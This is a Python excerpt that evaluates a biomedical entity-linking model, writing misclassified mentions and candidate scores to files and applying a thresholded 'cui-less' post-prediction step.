def predict_data(test_data, entity_path, model, predict_path, score_path, test_path, dataset):
entity_dict, id_map = load_entity(entity_path)
acc_cnt, total_cnt = 0, 0
w_l = ''
all_score = ''
for data, labels, raw_data in test_data:
total_cnt += 1
groud_truth, doc_id, mention = raw_data[0], raw_data[1], raw_data[2]
raw_entity_list = data['entity_name']
pred_result = predict_batch(data, model, batch_size=len(labels))
pred_result = [j for r in pred_result for j in r]
pred_index = np.argmax(pred_result)
pred_label = labels[pred_index]
pred_entity_name = raw_entity_list[pred_index]
#all score
all_score += doc_id + '\t' + mention
for index, score in enumerate(pred_result):
entity_id = labels[index]
entity_name = raw_entity_list[index]
all_score += '\t' + entity_id + '\t' + entity_name + '\t' + str(round(score, 4))
all_score += '\n'
if pred_label == groud_truth:
acc_cnt += 1
else:
# write wrong results down
if groud_truth in id_map:
groud_truth = id_map[groud_truth]
ground_name = ''
if '+' in groud_truth:
ground_name = groud_truth
else:
if groud_truth not in entity_dict:
ground_name = ground_name
else:
ground_name = entity_dict[groud_truth][0]
w_l += doc_id + '\t' + mention + '\t' + groud_truth + '\t' + \
ground_name + '\t' + pred_label + '\t' + pred_entity_name + '\n'
accuracy = 1.0 * acc_cnt / (total_cnt+1)
with open(predict_path, 'w', encoding='utf8')as f:
f.write(w_l)
with open(score_path, 'w', encoding='utf8')as f:
f.write(all_score)
if dataset == 'clef':
return post_predict(test_path, score_path, entity_path)
else:
return accuracy
def post_predict(test_path, score_path, entity_path, alpha=0.75):
candidate_dict = load_candidates2(score_path)
test_data, all_data = load_train_data(test_path)
entity_dict, _ = load_entity(entity_path)
acc_cnt, w_l = 0, ''
predict_dict = dict()
for mention, candidates in candidate_dict.items():
if len(candidates) == 1:
predict_dict[mention] = (candidates[0][0], candidates[0][1])
continue
max_score, max_can = candidates[0][2], candidates[0]
for e_id, e_name, e_score in candidates:
if e_score > max_score:
max_score = e_score
max_can = (e_id, e_name, e_score)
e_id, e_name, e_score = max_can
if e_score < alpha:
e_id, e_name = 'cui-less', 'cui-less'
predict_dict[mention] = (e_id, e_name)
for doc_id, mention, label in all_data:
if str.lower(label) == 'cui-less':
label = 'cui-less'
pred_label, pred_entity_name = predict_dict[mention]
if pred_label == label:
acc_cnt += 1
else:
entity_name = 'None'
if label in entity_dict:
entity_name = entity_dict[label][0]
w_l += doc_id + '\t' + mention + '\t' + label + '\t' + \
entity_name + '\t' + pred_label + '\t' + pred_entity_name + '\n'
with open('../checkpoints/post_predict_result.txt', 'w')as f:
f.write(w_l)
total_cnt = len(all_data)
accuracy = 1.0 * acc_cnt / (total_cnt)
return accuracy
if __name__ == '__main__':
flag = 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.